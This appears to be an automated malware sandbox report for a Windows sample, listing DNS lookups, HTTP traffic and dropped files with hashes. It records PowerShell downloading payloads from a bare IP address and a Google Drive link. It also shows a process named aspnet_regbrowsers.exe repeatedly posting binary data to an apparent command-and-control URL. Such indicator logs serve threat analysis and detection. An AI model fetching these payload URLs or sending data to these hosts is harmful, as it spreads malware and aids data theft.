x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 2239109
    Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
    X-GUploader-UploadID: AHmUCY2oKotDzK5LwGAdNer6_I7xivXcT4RuQ6TL4fgokKdpXAhHPR83QYFGG2_VdcXb4uNnhvQnNQr2yg
    Date: Sat, 26 Oct 2024 02:08:29 GMT
    Expires: Sat, 26 Oct 2024 02:08:29 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=WqxmdA==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    193.187.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    193.187.250.142.in-addr.arpa
    IN PTR
    Response
    193.187.250.142.in-addr.arpa
    IN PTR
    lhr25s33-in-f11e100net
  • flag-us
    GET
    http://192.3.176.141/42/LOGLKI.txt
    powershell.exe
    Remote address:
    192.3.176.141:80
    Request
    GET /42/LOGLKI.txt HTTP/1.1
    Host: 192.3.176.141
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sat, 26 Oct 2024 02:08:38 GMT
    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
    Last-Modified: Fri, 25 Oct 2024 03:56:38 GMT
    ETag: "22aac-625451b21eced"
    Accept-Ranges: bytes
    Content-Length: 141996
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/plain
  • flag-de
    POST
    http://94.156.177.220/logs/five/fre.php
    aspnet_regbrowsers.exe
    Remote address:
    94.156.177.220:80
    Request
    POST /logs/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.220
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: F0B98DE8
    Content-Length: 358
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Sat, 26 Oct 2024 02:08:41 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 15
    Connection: close
    X-Powered-By: PHP/5.4.16
    Status: 404 Not Found
  • flag-de
    POST
    http://94.156.177.220/logs/five/fre.php
    aspnet_regbrowsers.exe
    Remote address:
    94.156.177.220:80
    Request
    POST /logs/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.220
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: F0B98DE8
    Content-Length: 180
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Sat, 26 Oct 2024 02:08:41 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 15
    Connection: close
    X-Powered-By: PHP/5.4.16
    Status: 404 Not Found
  • flag-de
    POST
    http://94.156.177.220/logs/five/fre.php
    aspnet_regbrowsers.exe
    Remote address:
    94.156.177.220:80
    Request
    POST /logs/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.220
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: F0B98DE8
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Sat, 26 Oct 2024 02:08:42 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 23
    Connection: close
    X-Powered-By: PHP/5.4.16
    Status: 404 Not Found
  • flag-us
    DNS
    220.177.156.94.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.177.156.94.in-addr.arpa
    IN PTR
    Response
    220.177.156.94.in-addr.arpa
    IN PTR
    94-156-177-220 virtualineorg
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    77.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    77.190.18.2.in-addr.arpa
    IN PTR
    Response
    77.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-77deploystaticakamaitechnologiescom
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-de
    POST
    http://94.156.177.220/logs/five/fre.php
    aspnet_regbrowsers.exe
    Remote address:
    94.156.177.220:80
    Request
    POST /logs/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.220
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: F0B98DE8
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Sat, 26 Oct 2024 02:09:42 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 23
    Connection: close
    X-Powered-By: PHP/5.4.16
    Status: 404 Not Found
  • flag-us
    DNS
    79.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    79.190.18.2.in-addr.arpa
    IN PTR
    Response
    79.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-79deploystaticakamaitechnologiescom
  • flag-us
    DNS
    30.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    30.243.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239339388084_14BR1HNZO7MDFJS4B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239339388084_14BR1HNZO7MDFJS4B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 586896
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 46DD998CAA264D5492B6539495FE18DF Ref B: LON601060101060 Ref C: 2024-10-26T02:09:58Z
    date: Sat, 26 Oct 2024 02:09:57 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360284735_1J9G8ZRD0Q7KNETKQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239360284735_1J9G8ZRD0Q7KNETKQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 666327
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 07D23A30C2E44A8590706E8306D6AC4E Ref B: LON601060101060 Ref C: 2024-10-26T02:09:58Z
    date: Sat, 26 Oct 2024 02:09:57 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360284621_15T7M3RM45GPX2VDW&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239360284621_15T7M3RM45GPX2VDW&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 754374
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 21368F7904A148379262665C0451787B Ref B: LON601060101060 Ref C: 2024-10-26T02:09:58Z
    date: Sat, 26 Oct 2024 02:09:57 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360284620_1TF9ZP2GQ6Z0HCCJW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239360284620_1TF9ZP2GQ6Z0HCCJW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 659871
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 48D593D18C15427A8EA53E3E2BE4D743 Ref B: LON601060101060 Ref C: 2024-10-26T02:09:58Z
    date: Sat, 26 Oct 2024 02:09:57 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239339388083_1LK8GG0XUINT2UANS&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239339388083_1LK8GG0XUINT2UANS&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 705144
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 0DE559BE071A4BAA9AE3DC9C89ACE5A3 Ref B: LON601060101060 Ref C: 2024-10-26T02:09:58Z
    date: Sat, 26 Oct 2024 02:09:57 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360284736_11427X8L96F0YA4AW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239360284736_11427X8L96F0YA4AW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 679182
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: F3A8BE44CC984CC4912E76466E93195A Ref B: LON601060101060 Ref C: 2024-10-26T02:09:58Z
    date: Sat, 26 Oct 2024 02:09:58 GMT
  • flag-de
    POST
    http://94.156.177.220/logs/five/fre.php
    aspnet_regbrowsers.exe
    Remote address:
    94.156.177.220:80
    Request
    POST /logs/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 94.156.177.220
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: F0B98DE8
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Server: nginx/1.26.1
    Date: Sat, 26 Oct 2024 02:10:42 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 23
    Connection: close
    X-Powered-By: PHP/5.4.16
    Status: 404 Not Found
  • 150.171.28.10:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=
    tls, http2
    2.0kB
    9.3kB
    21
    18

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=fdca011e451b481cad68563694443e9e&localId=w:0D9BF488-1CCA-294D-7D68-DBFAFE0B8D20&deviceId=6966572651500221&anid=

    HTTP Response

    204
  • 192.3.176.141:80
    http://192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIF
    http
    PoweRShELl.EXe
    5.3kB
    144.5kB
    108
    105

    HTTP Request

    GET http://192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIF

    HTTP Response

    200
  • 142.250.179.238:443
    https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
    tls, http
    powershell.exe
    823 B
    8.5kB
    9
    10

    HTTP Request

    GET https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

    HTTP Response

    303
  • 142.250.187.193:443
    https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
    tls, http
    powershell.exe
    52.2kB
    1.8MB
    923
    1286

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download

    HTTP Response

    200
  • 192.3.176.141:80
    http://192.3.176.141/42/LOGLKI.txt
    http
    powershell.exe
    2.7kB
    146.6kB
    57
    106

    HTTP Request

    GET http://192.3.176.141/42/LOGLKI.txt

    HTTP Response

    200
  • 94.156.177.220:80
    http://94.156.177.220/logs/five/fre.php
    http
    aspnet_regbrowsers.exe
    918 B
    480 B
    7
    6

    HTTP Request

    POST http://94.156.177.220/logs/five/fre.php

    HTTP Response

    404
  • 94.156.177.220:80
    http://94.156.177.220/logs/five/fre.php
    http
    aspnet_regbrowsers.exe
    740 B
    480 B
    7
    6

    HTTP Request

    POST http://94.156.177.220/logs/five/fre.php

    HTTP Response

    404
  • 94.156.177.220:80
    http://94.156.177.220/logs/five/fre.php
    http
    aspnet_regbrowsers.exe
    667 B
    488 B
    6
    6

    HTTP Request

    POST http://94.156.177.220/logs/five/fre.php

    HTTP Response

    404
  • 94.156.177.220:80
    http://94.156.177.220/logs/five/fre.php
    http
    aspnet_regbrowsers.exe
    713 B
    488 B
    7
    6

    HTTP Request

    POST http://94.156.177.220/logs/five/fre.php

    HTTP Response

    404
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    https://tse1.mm.bing.net/th?id=OADD2.10239360284736_11427X8L96F0YA4AW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    tls, http2
    146.2kB
    4.2MB
    3070
    3066

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239339388084_14BR1HNZO7MDFJS4B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360284735_1J9G8ZRD0Q7KNETKQ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360284621_15T7M3RM45GPX2VDW&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360284620_1TF9ZP2GQ6Z0HCCJW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239339388083_1LK8GG0XUINT2UANS&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360284736_11427X8L96F0YA4AW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Response

    200
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 150.171.27.10:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    6.9kB
    15
    13
  • 94.156.177.220:80
    http://94.156.177.220/logs/five/fre.php
    http
    aspnet_regbrowsers.exe
    713 B
    488 B
    7
    6

    HTTP Request

    POST http://94.156.177.220/logs/five/fre.php

    HTTP Response

    404
  • 8.8.8.8:53
    196.249.167.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    196.249.167.52.in-addr.arpa

  • 8.8.8.8:53
    74.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    74.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    148 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    150.171.28.10
    150.171.27.10

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    43.58.199.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    43.58.199.20.in-addr.arpa

  • 8.8.8.8:53
    10.28.171.150.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    10.28.171.150.in-addr.arpa

  • 8.8.8.8:53
    141.176.3.192.in-addr.arpa
    dns
    72 B
    121 B
    1
    1

    DNS Request

    141.176.3.192.in-addr.arpa

  • 8.8.8.8:53
    drive.google.com
    dns
    powershell.exe
    62 B
    78 B
    1
    1

    DNS Request

    drive.google.com

    DNS Response

    142.250.179.238

  • 8.8.8.8:53
    drive.usercontent.google.com
    dns
    powershell.exe
    74 B
    90 B
    1
    1

    DNS Request

    drive.usercontent.google.com

    DNS Response

    142.250.187.193

  • 8.8.8.8:53
    217.106.137.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    217.106.137.52.in-addr.arpa

  • 8.8.8.8:53
    193.187.250.142.in-addr.arpa
    dns
    74 B
    112 B
    1
    1

    DNS Request

    193.187.250.142.in-addr.arpa

  • 8.8.8.8:53
    220.177.156.94.in-addr.arpa
    dns
    73 B
    116 B
    1
    1

    DNS Request

    220.177.156.94.in-addr.arpa

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
    160 B
    1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    77.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    77.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    55.36.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    55.36.223.20.in-addr.arpa

  • 8.8.8.8:53
    79.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    79.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    30.243.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    30.243.111.52.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    170 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    150.171.27.10
    150.171.28.10

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PoweRShELl.EXe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    12KB

    MD5

    6e7089bd3ecc0a465a82f49b17cf46a4

    SHA1

    f6dd41af6d63391d8ee06cbf5468ea7b45f458c7

    SHA256

    234f476aad0e1632854311cb2541f5d7b834da9495acf03a00a7f05a6d0e37f4

    SHA512

    ebff5aef93b9459bda1fd03cbfd4a823ee3383c33eb4cb3e8fa55c4892192c19204031e867b7479e5e07a716f10711aa8bd34f2502c64828655f09191d463dc9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    f0a775d055a0fdc8e1094e5c368967ed

    SHA1

    7de37e407fe9f2a1a8a5c23e5387918b128ce14c

    SHA256

    c9541744dfc8f8c3cb8f45e12d302eb83fc92ba10b456dab02b2f197ef1e41a5

    SHA512

    d22a6b477b34c41334da3e99a2f7e2e840575c49a1e5ff2363d41948074e581c4762194cb905284d1bd06ebfcc5ee3ee91046ec68f0abe25554f2499d1c29954

  • C:\Users\Admin\AppData\Local\Temp\RESA6CF.tmp

    Filesize

    1KB

    MD5

    119664a0bd8a9707b5caf4116a8f72c4

    SHA1

    e6dcac25b5dfd54fed8b3a15b580e31845e1a1a0

    SHA256

    ff57ee47abff1bb4df70ac545b29496f21b89bd511c432976854db05bac62aaf

    SHA512

    a2c704b40c666dace57cdc2367545d02a3f74f6d2654d312fb0932865bfcfa9acfab99762e8a566985efc3ee0155d8bbc42572e0929e11970e3cb78cd4579c4d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_htv5qccp.54y.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\baac1aba\baac1aba.dll

    Filesize

    3KB

    MD5

    5495701d63b7f16623ab6487b356f0de

    SHA1

